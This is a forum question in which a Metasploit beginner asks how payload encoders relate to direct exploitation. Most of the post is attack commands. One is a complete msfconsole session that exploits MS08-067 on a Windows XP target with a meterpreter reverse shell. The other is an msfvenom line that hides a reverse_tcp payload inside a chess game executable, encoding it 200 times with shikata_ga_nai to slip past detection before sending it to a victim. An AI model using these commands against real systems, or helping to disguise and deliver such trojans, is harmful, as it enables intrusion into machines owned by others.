I am a newbie in Metasploit, still clearing up my basics, but I have a bit of confusion. If anyone can answer me I would be highly obliged.
1 ) –
Previously I learned how to simply exploit any OS vulnerability using meterpreter. We can send an exploit to the target system and create a bind shell/reverse shell for control. Ex. –
Hack Windows XP with the MS08-067 exploit
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4 (Target)
RHOST => 192.168.1.4
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > exploit
meterpreter > sysinfo
meterpreter > shell
Now, with the above commands, we can use the shell of the target from the attacker machine. There is no need to create any exe in order to connect to the target vulnerable system. Meterpreter is automatically injected into memory and we can get a shell.
2 ) –
Now, when we use an encoder, we have to create an exe and bind our payload inside the exe. When the victim runs this exe we can get the victim system's shell.
msfvenom -p windows/meterpreter/reverse_tcp LHOST= “” LPORT= “”-x /usr/share/chess.exe -e x86/shikata_ga_nai -i 200 -f exe >chess.exe
In order to exploit the victim system we have to transfer this exe to the victim system.
I just want to know: previously we didn't require any exe in order to exploit the system, but with the use of an encoder we need an exe to hide the payload.
Can we simply encode our meterpreter tcp_bind payload without an exe and send this to the victim system?
Any help is really appreciated.